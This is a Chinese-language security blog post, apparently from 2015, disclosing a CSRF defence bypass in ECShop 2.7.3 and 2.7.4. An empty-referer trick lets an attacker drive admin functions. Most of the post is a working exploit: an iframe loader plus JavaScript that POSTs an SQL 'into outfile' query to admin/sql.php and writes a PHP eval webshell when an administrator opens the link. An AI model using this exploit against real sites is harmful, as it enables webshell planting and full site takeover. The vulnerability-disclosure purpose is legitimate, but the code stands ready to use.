ecshop csrf防御绕过后台敏感功能csrf getshell

CracerCracer 2015-12-29 代码审计 621 0 2

4简要描述:

csrf防御绕过。

详细说明:

可以csrf执行后台各种敏感功能。这里分析的是利用空referer的方式绕过。参考http://zone.wooyun.org/content/744

利用这个绕过可以实现ecshop各个版本的csrf getshell,csrf dump数据库。测试了2.7.3一个版本和最新的2.7.4

本文可以看做该帖子的http://zone.wooyun.org/content/744的一个实例测试。感谢大神们分享技术.

exp1,csrf getshell 利用执行sql的接口,结合报路径漏洞。

新建html文件内容为:

<iframe src="javascript:'<script src=http://127.0.0.1/ecshop2.7.4/csrf.js></script>'"></iframe>

新建 http://127.0.0.1/ecshop2.7.4/csrf.js js文件。内容为:

code 区域

var url="http://127.0.0.1/ecshop2.7.4/admin/sql.php";



var sendata = "sql=select+%22%3C%3Fphp+%40eval%28%24_POST%5B%27c%27%5D%29%3B%3F%3E%22+into+outfile+%27C%物理路径Ctestcsrf.php%27%3B&act=query";



if (window.XMLHttpRequest){



var xmlhttp1=new XMLHttpRequest();



}



else{



var xmlhttp1=new ActiveXObject("Microsoft.XMLHTTP");



}



xmlhttp1.open("POST",url,true);



xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");



xmlhttp1.send(sendata);

 

管理员访问链接即可生成testcsrf.php的文件。

77

12

转载请注明来自Cracer,本文标题:《ecshop csrf防御绕过后台敏感功能csrf getshell》

喜欢 (2) 发布评论
发表评论


Top